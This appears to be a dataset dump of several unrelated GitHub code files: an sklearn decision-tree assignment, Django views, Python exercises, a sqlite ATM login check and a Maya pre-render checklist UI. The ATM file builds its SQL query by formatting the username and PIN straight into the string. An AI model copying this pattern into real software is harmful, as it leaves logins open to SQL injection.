time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n print(\"Accuracy:\", metrics.accuracy_score(y_test, random_pred))\n\n\ndef regression_tree(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 2 - Regression Tree ------------------\")\n model_start_time = time.time()\n # Create a dictionary of all the parameter options\n param_grid = {\n 'max_leaf_nodes': list(range(10, 60)),\n 'max_depth': [10, 12, 14],\n 'min_samples_split': [2, 3, 4, 5]}\n\n # Create a grid search object\n gsDCT = GridSearchCV(DecisionTreeRegressor(), param_grid, cv=5)\n\n # Fit the grid search\n gsDCT.fit(X_train, y_train)\n\n print(gsDCT.best_estimator_)\n # Predict the response for test dataset\n y_pred = gsDCT.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n # Model Accuracy, how often is the classifier correct?\n print(\"MSE :\", metrics.mean_squared_error(y_test, y_pred))\n\n\ndef regression_forest(X_train, X_test, 
y_train, y_test):\n    print(\"------------------ C - 2 - Regression Forest ------------------\")\n    model_start_time = time.time()\n    # Hyperparameter grid\n    param_grid = {\n        'n_estimators': [100, 150, 200, 250], # The number of trees in the forest.\n        'max_depth': [None, 10, 20, 30], # The maximum depth of the tree.\n        'max_features': ['sqrt'], # The number of features to consider when looking for the best split\n        'min_samples_split': [2, 5, 10, 15], # The minimum number of samples required to split an internal node\n        'bootstrap': [True] # Whether bootstrap samples are used when building trees.\n    }\n\n    # Create a grid search object\n    gsRFC = GridSearchCV(RandomForestRegressor(), param_grid, n_jobs=-1, cv=5)\n\n    # Fit\n    gsRFC.fit(X_train, np.ravel(y_train, order='C'))\n    print(gsRFC.best_params_)\n\n    best_model = gsRFC.best_estimator_\n    random_pred = best_model.predict(X_test)\n\n    elapsed_time = time.time() - model_start_time\n    print('Elapsed Time : {}'.format(time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time))))\n\n    print(\"MSE after optimization:\", metrics.mean_squared_error(y_test, random_pred))\n\n\ndef encode_features(my_data):\n    encode = preprocessing.LabelEncoder()\n    features = categorical_cols(my_data)\n    for x in features:\n        my_data[x] = (encode.fit_transform(my_data[x]))\n    return my_data\n\n\ndef categorical_cols(my_data):\n    cols = my_data.columns\n    num_cols = my_data._get_numeric_data().columns\n    feature_col = list(set(cols) - set(num_cols))\n    return feature_col\n\n\nif __name__ == \"__main__\":\n    data = pd.read_excel(\"adult_income.xlsx\", sheet_name='adult_income_data', header=0) # 30162 rows\n\n    # 1)\tTrain: rows 1-19,034.\n    # 2)\tValidation: rows 19,035-24,130.\n    # 3)\tTest: rows 24,130-end.\n    # note: the splits below are random (roughly 80/20), not these fixed row ranges\n\n    feature_cols = data.columns\n    # get all columns but the last ( the last column is the class )\n    feature_cols = feature_cols[:-1]\n    X = data[feature_cols]\n\n    # (1) classification using a tree and a forest\n\n    # DATA FOR CLASSIFICATION\n\n    # encode all categorical features\n    X = encode_features(X)\n\n    # the class is the last column\n    y = data[data.columns[-1]]\n    target_col = data.columns[-1]\n\n    y = y.to_numpy()\n    X_2 = X.to_numpy()\n\n    X1_train, X1_test, y1_train, y1_test = train_test_split(X_2, y, test_size=0.19995, random_state=1)\n\n    # BUILD THE TREE / FOREST\n\n    classification_tree(X1_train, X1_test, y1_train, y1_test)\n    classification_forest(X1_train, X1_test, y1_train, y1_test)\n\n    # (2) Regression using both a tree and forest\n\n    # DATA FOR REGRESSION\n    cols_to_drop = ['education', 'education-num', 'occupation', '>50K']\n    y2 = X[['education-num']]\n    X2 = data.drop(cols_to_drop, axis=1)\n\n    # encode all categorical features\n    X2 = encode_features(X2)\n\n    y2 = y2.to_numpy()\n    X2 = X2.to_numpy()\n\n    X2_train, X2_test, y2_train, y2_test = train_test_split(X2, y2, test_size=0.19995, random_state=1)\n\n    # BUILD THE TREE / FOREST\n\n    regression_tree(X2_train, X2_test, y2_train, y2_test)\n    regression_forest(X2_train, X2_test, y2_train, y2_test)\n","repo_name":"Nareed/Machine-Learning-Assignments","sub_path":"Assignment01/SectionC.py","file_name":"SectionC.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"74330997952","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport markdown\nfrom .models import About, Project\n\n# Create your views here.\ndef index(request):\n    print('---------- rendering About')\n    cards = []\n    for about in About.objects.all(): \n        
cards.append({\n            'title': about.title,\n            'sub_title_1': about.sub_title_1,\n            'sub_title_2': about.sub_title_2,\n            'content_1': about.content_1,\n            'content_2': about.content_2,\n        })\n    context = {\n        'title': 'about',\n        'path': '/', \n        'cards': cards,\n        'pages': pages(),\n    }\n    return render(request, 'index.html', context)\n\ndef projects(request):\n    print('---------- rendering Projects')\n    cards = []\n    for project in Project.objects.all(): \n        cards.append({\n            'title': project.title,\n            'sub_title': project.sub_title,\n            'link': project.link,\n            'image': project.image,\n        })\n    context = {\n        'title': 'projects',\n        'path': 'projects', \n        'cards': cards,\n        'pages': pages(),\n    }\n    return render(request, 'projects.html', context)\n\ndef pages(): \n    return [\n        {'title': 'about', 'path': '/'}, \n        {'title': 'projects', 'path': 'projects'}, \n    ]\n\ndef markdown_convert(text): \n    md = markdown.Markdown(extensions=[\"markdown.extensions.meta\", \"markdown.extensions.attr_list\", \"markdown.extensions.extra\"])\n    data = text\n    return md.convert(text)\n","repo_name":"josh-p-thompson/about-me-django-orm","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"38563744799","text":"# Py Adv W3 L5 Square with Maximum Sum\n\n# input 3, 6\n# 7, 1, 3, 3, 2, 1\n# 1, 3, 9, 8, 5, 6\n# 4, 6, 7, 9, 1, 0\n# output 9 8\n#        7 9\n#        33\n\n# Write a program that reads a matrix from the console.\n# On the first line you will get the matrix sizes in format \"{rows}, {columns}\".\n# On the next rows, you will get the elements of each row separated with a \", \".\n# Find the top-left 2x2 submatrix\n# with the biggest sum of its values.\n# Print the matrix and the sum of its elements as shown in the examples.\nimport sys\nmatrix = []\nmax_sum = -sys.maxsize\n# keep the sizes (rows, cols) separate from the loop variables (row, column)\nrows, cols = [int(el) for el in input().split(\", \")]\nfor _ in range(rows):\n    matrix.append([int(el) for el in input().split(\", \")])\nposition = None\n# scan from bottom-right to top-left so that ties resolve to the top-left square\nfor row in range(rows-1, 0, -1):\n    for column in range(cols-1, 0, -1):\n        a = matrix[row][column]\n        b = matrix[row][column-1]\n        c = matrix[row-1][column]\n        d = matrix[row-1][column-1]\n        current_sum = a + b + c + d\n        if current_sum >= max_sum:\n            max_sum = current_sum\n            position = (row, column)\nrow, col = position\nprint(matrix[row-1][col-1], matrix[row-1][col])\nprint(matrix[row][col-1], matrix[row][col])\nprint(max_sum)","repo_name":"drgmzgb/Python-Advanced-","sub_path":"#3-Matrix/Py Adv W3 L5 Square with Maximum Sum.py","file_name":"Py Adv W3 L5 Square with Maximum Sum.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"29358236616","text":"'''\ncheck whether the username and PIN match\nif they match, the user enters the ATM menu\nif they do not match, the user is sent back to the start\n'''\n\nimport sqlite3\n\ndef cek_pengguna():\n    # initiate connection\n    conn = sqlite3.connect('data.db')\n    # create a cursor\n    c = conn.cursor()\n    # check whether the user is valid or not\n    from ATM.run import masukkan_username,masukkan_pin\n    c.execute(\"SELECT * FROM data_pelanggan WHERE username='{}' \"\n              \"and pin='{}'\".format(masukkan_username, masukkan_pin))\n    if c.fetchall()==[]:\n        print('Sorry, the username and/or PIN is incorrect')\n        print('If you do not have an account yet, please contact our staff')\n        exit()\n    else:\n        print('You have logged in successfully')\n        c.execute(\"SELECT * FROM data_pelanggan WHERE username='{}' \"\n                  \"and pin='{}'\".format(masukkan_username, 
masukkan_pin))\n        login_user = c.fetchall()\n        for row in login_user:\n            pengguna_saat_ini = row[0]\n            pin_saat_ini = row[1]\n            saldo_saat_ini = row[2]\n","repo_name":"bryanbernigen/ITBSem1","sub_path":"Python/ATM/cek_pengguna.py","file_name":"cek_pengguna.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
{"seq_id":"22854564440","text":"def count1(num):\n    # count the occurrences of the digit 1 in all integers from 0 up to int(num)\n    l = len(num)\n    if l == 0:\n        return 0\n    first = int(num[0])\n    if l == 1 and first == 0:\n        return 0\n    if l == 1 and first == 1:\n        return 1\n    # ones contributed by the leading digit position\n    num_in_first = 0\n    if first > 1:\n        num_in_first = int(10 ** (l - 1))\n    elif first == 1:\n        num_in_first = int(num[1:]) + 1\n\n    # ones contributed by the lower positions while the leading digit varies\n    num_in_other = (first) * (l - 1) * int(10 ** (l - 2))\n    return num_in_first+num_in_other+count1(num[1:])\n\n\nif __name__ == \"__main__\":\n    print(count1('21345'))\n","repo_name":"fengjiachen/leetcode","sub_path":"append/count_1_in_digit.py","file_name":"count_1_in_digit.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"36162174663","text":"# -*- coding: utf-8 -*-\nimport maya.cmds as cmds\nimport maya.mel as mel\nZWFGlobalbuttonResultCJ={}\nZWFGlobalbuttonMiddCJ={}\nZWFGlobalbuttonResultJS={}\nZWFGlobalbuttonMiddJS={}\nclass CheckRenderSeting(object):\n\t'UI class'\n\tuiName=''\n\tdef __init__(self):\n\t\tfileInfoDateCJ=cmds.fileInfo('zwfRenderSetingButtonColorDatasCJ',q=True)\n\t\tfileInfoDateJS=cmds.fileInfo('zwfRenderSetingButtonColorDatasJS',q=True)\n\t\tif len(fileInfoDateCJ):\n\t\t\tself.zwfRenderSetingButtonColorDatasCJ=eval(fileInfoDateCJ[0])\n\t\telse:\n\t\t\tself.zwfRenderSetingButtonColorDatasCJ=[]\n\t\tif len(fileInfoDateJS):\n\t\t\tself.zwfRenderSetingButtonColorDatasJS=eval(fileInfoDateJS[0])\n\t\telse:\n\t\t\tself.zwfRenderSetingButtonColorDatasJS=[]\n\tdef setUiName(self,uiName):\n\t\t'Set a name of window'\n\t\tself.uiName=uiName\n\tdef creatUi(self):\n\t\t'UI core functions'\n\t\tif cmds.window(self.uiName,ex=1):\n\t\t\tcmds.deleteUI(self.uiName)\n\t\tcmds.window(self.uiName,t=u'提交渲染前检查工具',wh=(550,400))\n\t\tself.maiform=cmds.formLayout(numberOfDivisions=100)\n\n\t\tHelp_b=cmds.button(l=u'帮助',h=30)\n\t\tclose_b=cmds.button(l=u'关闭',h=30,c=self.closeWindow)\n\t\tpaneL=cmds.paneLayout( configuration='vertical2' ,ps=[1,60,40])\n\n\t\tself.tabs = cmds.tabLayout(innerMarginWidth=5, innerMarginHeight=5)\n\n\t\tself.button_listScr_CJ=cmds.scrollLayout(vst=1,hst=0,cr=1)\n\t\tframeCJ=cmds.frameLayout(label=u'场景提交渲染前执行按钮', borderStyle='etchedIn')\n\t\tbb=CreateButton()\n\t\tbb.create_button(True)\n\n\t\tcmds.setParent(self.tabs)\n\t\tself.button_listScr_JS=cmds.scrollLayout(vst=1,hst=0,cr=1)\n\t\tframeJS=cmds.frameLayout(label=u'角色提交渲染前执行按钮', borderStyle='etchedIn')\n\t\tcc=CreateButton()\n\t\tcc.create_button(False)\n\n\t\tcmds.tabLayout(self.tabs, edit=True, tabLabel=((self.button_listScr_CJ, u'场景'),(self.button_listScr_JS, u'角色')))\n\t\t\n\t\tcmds.setParent(paneL)\n\t\tself.help_listScr =cmds.scrollLayout(vst=1,hst=0,cr=1)\n\t\tcmds.frameLayout('ann_ts_frame',label=u'按钮提示', 
borderStyle='etchedIn')\n\n\t\tcmds.formLayout(self.maiform,e=True,\n\t\t\t\t\t\t\t\taf=[(Help_b,'left',5),(Help_b,'bottom',5),\n\t\t\t\t\t\t\t\t\t(close_b,'right',5),(close_b,'bottom',5),\n\t\t\t\t\t\t\t\t\t(paneL,'left',5),(paneL,'right',5),(paneL,'top',5)],\n\t\t\t\t\t\t\t\tac=[(paneL,'bottom',5,Help_b),(Help_b,'right',5,close_b)],\n\t\t\t\t\t\t\t\tap=[(close_b,'left',0,50)]\n\t\t\t\t\t\t\t\t)\n\t\t#cmds.tabLayout(self.tabs, edit=True, tabLabel=((frameCJ, u'场景'), (frameCJ, u'角色')))\n\t\tcmds.window(self.uiName,e=True,wh=(730,400))\n\t\tcmds.showWindow(self.uiName)\n\tdef closeWindow(self,*args):\n\t\t'delete UI'\n\t\tcmds.deleteUI(self.uiName)\nclass ZhuButton(object):\n\t'Create button class'\n\tlabel=''\n\tdef __init__(self,isCJ):\n\t\tself.buttonlabel=''\n\t\tself.isCJ=isCJ\n\tdef saveRenderSetingButtonColorControlDatasCJ(self,baochuanwenjianCJ):\n\t\tcmds.fileInfo('zwfRenderSetingButtonColorDatasCJ',str(baochuanwenjianCJ))\n\n\tdef saveRenderSetingButtonColorControlDatasJS(self,baochuanwenjianJS):\n\t\tcmds.fileInfo('zwfRenderSetingButtonColorDatasJS',str(baochuanwenjianJS))\n\n\tdef setname(self,label):\n\t\t'set a name of button'\n\t\tself.labelname=label\n\tdef createButton(self):\n\t\t'create button core function'\n\t\tanform=cmds.formLayout(numberOfDivisions=100)\n\t\tself.button=cmds.button(l=self.labelname)\n\t\tself.button_labelname()\n\t\tif self.isCJ:\n\t\t\tZWFGlobalbuttonResultCJ[self.button]=[]\n\t\t\tfor each in ZWFGlobalbuttonResultCJ:\n\t\t\t\tZWFGlobalbuttonResultCJ[each].append(self.button)\n\n\t\t\tZWFGlobalbuttonMiddCJ[self.buttonlabel]=[]\n\t\t\tfor single in ZWFGlobalbuttonMiddCJ:\n\t\t\t\tZWFGlobalbuttonMiddCJ[single].append(self.buttonlabel)\n\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif self.buttonlabel in bb.zwfRenderSetingButtonColorDatasCJ:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0,1,0])\n\t\t\telse:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0.51,0.51,0.51])\n\t\telse:\n\t\t\tZWFGlobalbuttonResultJS[self.button]=[]\n\t\t\tfor each in ZWFGlobalbuttonResultJS:\n\t\t\t\tZWFGlobalbuttonResultJS[each].append(self.button)\n\n\t\t\tZWFGlobalbuttonMiddJS[self.buttonlabel]=[]\n\t\t\tfor single in ZWFGlobalbuttonMiddJS:\n\t\t\t\tZWFGlobalbuttonMiddJS[single].append(self.buttonlabel)\n\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif self.buttonlabel in bb.zwfRenderSetingButtonColorDatasJS:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0,1,0])\n\t\t\telse:\n\t\t\t\tcmds.button(self.button,e=True,bgc=[0.51,0.51,0.51])\n\n\t\tcmds.button(self.button,e=True,c=self.setbutton_bgc_g)\n\t\tself.ht_b=cmds.button(l='H&&T',c=self.button_ts,bgc=[0.51,0.51,0.51])\n\t\tself.r_b=cmds.button(l='R',c=self.setbutton_bgc_l,bgc=[0.51,0.51,0.51])\n\t\tcmds.formLayout(anform,e=True,\n\t\t\t\t\t\t\t\taf=[(self.button,'left',5),(self.button,'top',0),\n\t\t\t\t\t\t\t\t\t(self.r_b,'right',5),(self.r_b,'top',0),\n\t\t\t\t\t\t\t\t\t(self.ht_b,'top',0)],\n\t\t\t\t\t\t\t\tac=[(self.ht_b,'left',1,self.button),(self.ht_b,'right',1,self.r_b)],\n\t\t\t\t\t\t\t\tap=[(self.button,'right',0,70),(self.r_b,'left',0,85)]\n\t\t\t\t\t\t\t\t)\n\tdef setbutton_bgc_g(self,*args):\n\t\tcmds.button(self.button,e=True,bgc=[0,1,0])\n\t\tbb=CheckRenderSeting()\n\t\tif self.isCJ:\n\t\t\tif self.buttonlabel not in bb.zwfRenderSetingButtonColorDatasCJ:\n\t\t\t\tbb.zwfRenderSetingButtonColorDatasCJ.append(self.buttonlabel)\n\t\t\tself.saveRenderSetingButtonColorControlDatasCJ(bb.zwfRenderSetingButtonColorDatasCJ)\n\t\telse:\n\t\t\tif self.buttonlabel not in 
bb.zwfRenderSetingButtonColorDatasJS:\n\t\t\t\tbb.zwfRenderSetingButtonColorDatasJS.append(self.buttonlabel)\n\t\t\tself.saveRenderSetingButtonColorControlDatasJS(bb.zwfRenderSetingButtonColorDatasJS)\n\n\tdef setbutton_bgc_l(self,*args):\n\t\tif self.isCJ:\n\t\t\tfor single in ZWFGlobalbuttonResultCJ[self.button]:\n\t\t\t\tcmds.button([single],e=True,bgc=[0.51,0.51,0.51])\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif len(bb.zwfRenderSetingButtonColorDatasCJ):\n\t\t\t\tfor each in ZWFGlobalbuttonMiddCJ[self.buttonlabel]:\n\t\t\t\t\tif each in bb.zwfRenderSetingButtonColorDatasCJ:\n\t\t\t\t\t\tbb.zwfRenderSetingButtonColorDatasCJ=self.removeItem(bb.zwfRenderSetingButtonColorDatasCJ,each)\n\t\t\t\tself.saveRenderSetingButtonColorControlDatasCJ(bb.zwfRenderSetingButtonColorDatasCJ)\n\t\telse:\n\t\t\tfor single in ZWFGlobalbuttonResultJS[self.button]:\n\t\t\t\tcmds.button([single],e=True,bgc=[0.51,0.51,0.51])\n\t\t\tbb=CheckRenderSeting()\n\t\t\tif len(bb.zwfRenderSetingButtonColorDatasJS):\n\t\t\t\tfor each in ZWFGlobalbuttonMiddJS[self.buttonlabel]:\n\t\t\t\t\tif each in bb.zwfRenderSetingButtonColorDatasJS:\n\t\t\t\t\t\tbb.zwfRenderSetingButtonColorDatasJS=self.removeItem(bb.zwfRenderSetingButtonColorDatasJS,each)\n\t\t\t\tself.saveRenderSetingButtonColorControlDatasJS(bb.zwfRenderSetingButtonColorDatasJS)\n\tdef removeItem(self,oldlist,reItem):\n\t\tmidlist=[]\n\t\tfor i in oldlist:\n\t\t\tif i!=reItem:\n\t\t\t\tmidlist.append(i)\n\t\treturn midlist \n\n\tdef button_labelname(self):\n\t\tif self.labelname==u'搜索是否带有“_rig_slice.ma”关键字':\n\t\t\tself.buttonlabel='caizhimoxing'\n\t\tif self.labelname==u'制作cache文件':\n\t\t\tself.buttonlabel='zhizoudianhuanchuang'\n\t\telif self.labelname==u'切换到材质模型':\n\t\t\tself.buttonlabel='wenjiandianhuanchuan'\n\t\telif self.labelname==u'确认主光方向':\n\t\t\tself.buttonlabel='zhuguangfangxiang'\n\t\telif self.labelname==u'保存角色交互的场景文件':\n\t\t\tself.buttonlabel='baocjuesejiaohuchangjing'\n\t\telif self.labelname==u'设置assetID,并检查':\n\t\t\tself.buttonlabel='shezhiID'\n\t\telif self.labelname==u'导入场景进行优化':\n\t\t\tself.buttonlabel='daoruyouhuachangjing'\n\t\telif self.labelname==u'优化场景':\n\t\t\tself.buttonlabel='youhuachangjing'\n\t\telif self.labelname==u'清除灯光连接':\n\t\t\tself.buttonlabel='deletedengguanglianjie'\n\t\telif self.labelname==u'拷贝贴图至本地':\n\t\t\tself.buttonlabel='tietudaobendi'\n\t\telif self.labelname==u'导出场景影响角色物体(Occ,shadow)':\n\t\t\tself.buttonlabel='daochuchangjingos'\n\t\telif self.labelname==u'导出场景影响角色物体(mask)':\n\t\t\tself.buttonlabel='daochuchangjingmask'\n\t\telif self.labelname==u'导入场景影响角色物体(Occ,shadow)':\n\t\t\tself.buttonlabel='daoruchangjingos'\n\t\telif self.labelname==u'导入场景影响角色物体(mask)':\n\t\t\tself.buttonlabel='daoruchangjingmask'\n\t\telif self.labelname==u'优化无用的材质和材质球':\n\t\t\tself.buttonlabel='youhuamap'\n\t\telif self.labelname==u'优化sssMap':\n\t\t\tself.buttonlabel='youhuasssmap'\n\t\telif self.labelname==u'贴图精度优化':\n\t\t\tself.buttonlabel='daoruHDR'\n\t\telif self.labelname==u'建立HDR环境球':\n\t\t\tself.buttonlabel='jianliHDR'\n\t\telif self.labelname==u'导入相应灯光rig(CJ)':\n\t\t\tself.buttonlabel='daorudengguangrigcj'\n\t\telif self.labelname==u'导入相应灯光rig(JS)':\n\t\t\tself.buttonlabel='daorudengguangrigjs'\n\t\telif self.labelname==u'设置摄像机的远近裁切平面':\n\t\t\tself.buttonlabel='sxjqaiqiu'\n\t\telif self.labelname==u'灯光使用shadowMap(MR)':\n\t\t\tself.buttonlabel='shadowmap'\n\t\telif self.labelname==u'分层设置':\n\t\t\tself.buttonlabel='fengcengshizhi'\n\t\telif self.labelname==u'细分代理':\n\t\t\tself.buttonlabel='xifendaili'\n\t\telif 
self.labelname==u'另存场景':\n\t\t\tself.buttonlabel='baochunchuangjing'\n\t\telif self.labelname==u'场景渲染测试':\n\t\t\tself.buttonlabel='xuanranceshi'\n\t\telif self.labelname==u'渲染连续5帧(1280尺寸)':\n\t\t\tself.buttonlabel='xuanranwuzhen'\n\t\telif self.labelname==u'文件贴图过滤':\n\t\t\tself.buttonlabel='wenjianguolu'\n\t\telif self.labelname==u'请提高阴影品质':\n\t\t\tself.buttonlabel='yingyingpz'\n\t\telif self.labelname==u'修改原始模型':\n\t\t\tself.buttonlabel='xgyuanshimoxing'\n\t\telif self.labelname==u'贴图路径指回服务器':\n\t\t\tself.buttonlabel='tietiedaofuwuqi'\n\t\telif self.labelname==u'指定渲染前需要执行的mel':\n\t\t\tself.buttonlabel='xuanranmel'\n\t\telif self.labelname==u'另存Occ文件':\n\t\t\tself.buttonlabel='baochuanoccwenjian'\n\t\telif self.labelname==u'文件提交服务器':\n\t\t\tself.buttonlabel='wenjiantijiaofuwuqi'\n\t\telif self.labelname==u'deadline提交渲染':\n\t\t\tself.buttonlabel='deadlinetijiaoxuanran'\n\n\tdef button_h(self):\n\t\tif self.labelname==u'搜索是否带有“_rig_slice.ma”关键字':\n\t\t\th=u'''\n使用文本工具(ultraedit://server-epic01/Software/PC_Softwares/other_Softwares/book/ultraEdit)打开文件,搜索是否带有“_rig_slice.ma”关键字,如果有,记录下来要求动画切换成带绑定高模文件。(遇到slice文件不做cache要直接做灯光的,操作步骤为灯光制作流程文档注3)。\n'''\n\t\t\treturn h\n\t\t\n\t\tif self.labelname==u'制作cache文件':\n\t\t\th=u'''\n第一步通过后,直接提交cache农场,制作cache文件。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'切换到材质模型':\n\t\t\th=u'''\n打开cache文件,切换好带材质模型。\n'''\n\t\t\timport switchShadingModel as SSM\n\t\t\tSSM.main()\n\t\t\treturn h\n\n\t\telif self.labelname==u'确认主光方向':\n\t\t\th=u'''\n确认主光方向,制作方式(与组长,总监确认)。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'保存角色交互的场景文件':\n\t\t\th=u'''\n打开作为角色交互的场景文件,赋予默认材质,去除细分节点,清除灯光连接,打组命名,保存。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'设置assetID,并检查':\n\t\t\th=u'''\n请您设置assetID,并检查(必须在Reference时做,Reference可能会在以后的步骤中被破坏)。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入场景进行优化':\n\t\t\th=u'''\n请您考虑是否导入场景进行优化。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'优化场景':\n\t\t\th=u'''\n请您根据镜头优化场景,删除看不到无影响的物体。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'清除灯光连接':\n\t\t\th=u'''\n请清除灯光连接。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'拷贝贴图至本地':\n\t\t\th=u'''\n使用指定工具拷贝贴图至本地路径。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导出场景影响角色物体(Occ,shadow)':\n\t\t\th=u'''\n根据动画layout及灯光效果图,判断对角色有阴影有遮罩或Occ影响的物体。选择他们另存一个文件供角色制作交互影响时使用(可以自己做简化的模型)\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导出场景影响角色物体(mask)':\n\t\t\th=u'''\n根据动画layout及灯光效果图,以及场景做好的分层关系,判断角色和场景之间的遮挡关系,导出相应的模型作为场景对角色的遮挡影响,如果和之前做做阴影和Occ的物体有重叠,请自行考虑是否使用同一文件\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入场景影响角色物体(Occ,shadow)':\n\t\t\th=u'''\n根据镜头导入事先优化的场景,作为场景对角色的 Occ,shadow 的影响。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入场景影响角色物体(mask)':\n\t\t\th=u'''\n根据镜头导入事先优化的场景,作为场景对角色的 遮挡的影响。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'优化无用的材质和材质球':\n\t\t\th=u'''\n优化无用的材质和材质球。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'优化sssMap':\n\t\t\th=u'''\n优化sssMap。\n'''\n\t\t\timport checkShadingModel as CSM\n\t\t\tCSM.checkShadingModel()\n\t\t\treturn h\n\n\t\telif self.labelname==u'贴图精度优化':\n\t\t\th=u'''\n贴图精度优化。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'建立HDR环境球':\n\t\t\th=u'''\n建立HDR环境球,导入对应场次HDR,取消环境球主渲染。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入相应灯光rig(CJ)':\n\t\t\th=u'''\n导入相应灯光rig, 设置直接光照。注意在摄像机前约束一个只开高光的灯并链接所有眼球。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'导入相应灯光rig(JS)':\n\t\t\th=u'''\n导入相应灯光rig(缺少预设文件,和路径设置), 设置直接光照。注意在摄像机前约束一个只开高光的灯并链接所有眼球。\n'''\n\t\t\treturn h\n\n\n\t\telif 
self.labelname==u'设置摄像机的远近裁切平面':\n\t\t\th=u'''\n设置摄像机的远近裁切平面(分别是摄像机的NearClipPlane,FarClipPlane值)。MR它只读设置的数值,不自动。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'灯光使用shadowMap(MR)':\n\t\t\th=u'''\n对没有场景物件移动的,灯光使用shadowMap(MR)的,注意设置偏移值(一般不用\n设置)自阴影,和采样值;对于使用 Raytrace Shadow 的要注意设置灯光阴影半角,\n阴影采样射线数,防止噪点闪烁。并且请注意渲染效率,减少使用阴影。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'分层设置':\n\t\t\th=u'''\n设置分层(分层工具需要注意的点:阴影,反射等关联的设置,分离灯光,Z,ID等\n不要忘记设置,并注意减少 Layer Override 。由于场景灯光种类繁多,分离灯光\n请选择性使用提高渲染效率)。设置阴影,反射,遮罩(注意不要忘记设置之前导\n入的作为角色影响的场景文件)等关联。使用Pass工具全局设置 ,\n使用Global Midfy Shaders来设置AO,Z,ID等(Z,ID必须根据场景场景设置)。\n详细使用请参看帮助。\n'''\n\t\t\timport Output_Pass_Tool_new as OPTN\n\t\t\tOPTN.call_OutputRenderPasses()\n\t\t\treturn h\n\n\t\telif self.labelname==u'细分代理':\n\t\t\th=u'''\n细分优化(需要模型提交时设置好smoothID,代理为代理,有问题的模型使用smooth)。\n'''\n\t\t\timport Addmentalraysubdivisionproxy as addMSP\n\t\t\taddMSP.call_Addmsp()\n\t\t\treturn h\n\n\t\telif self.labelname==u'另存场景':\n\t\t\th=u'''\n另存场景,设置GI场景(渲染面板预制mel,注意GI是32位图片。并且mi_blinn并不支持任何GI。),和Occ。其实occ最好分开做,因为会对材质进行 Override 大大影响效率。后面有一步制作occ,当时因为场景较小所以一起做了。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'场景渲染测试':\n\t\t\th=u'''\n场景渲染测试(渲染面板设置mel),如镜头运动,出多角度全尺寸合成图片。制作一张类似下图的HDR作为角色反射,灯光,GI的参考(需要等正常镜头QC通过,方能制作)。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'渲染连续5帧(1280尺寸)':\n\t\t\th=u'''\n成品质量1280尺寸,检测连续5帧(请选择运动镜头),用于检测是否有贴图,模型缝隙,阴影的闪烁。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'文件贴图过滤':\n\t\t\th=u'''\n如有贴图闪烁,或者感觉太模糊需要更好的过滤方式保证近景贴图清晰度的,改变贴图的过滤方式为MR的椭圆过滤(脚本更改)。\n'''\n\t\t\tmel.eval('RenderSettings')\n\t\t\treturn h\n\n\t\telif self.labelname==u'请提高阴影品质':\n\t\t\th=u'''\n如有阴影闪烁请提高阴影品质。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'修改原始模型':\n\t\t\th=u'''\n如有模型闪烁,请适当修改原始模型,保证后续镜头不受其影响。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'贴图路径指回服务器':\n\t\t\th=u'''\n所有贴图路径指回服务器。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'指定渲染前需要执行的mel':\n\t\t\th=u'''\n指定渲染前需要执行的mel。\n'''\n\t\t\treturn h\n\n\t\telif self.labelname==u'另存Occ文件':\n\t\t\th=u'''\n另存Occ文件,删除所有pass。在masterLayer,把mi_blinn转为lambert,转为occ材质(mel),使用HyperShader的\"Delete Unueses Nodes\"命令删除无用材质,执行Occ渲染预设,保存文件。\n'''\n\t\t\timport Shader_Tool as ST\n\t\t\tST.shader_ui()\n\t\t\treturn h\n\n\t\telif self.labelname==u'文件提交服务器':\n\t\t\th=u'''\n把该文件提交到服务器上面。\n'''\n\t\t\treturn h\n\n\t\telif 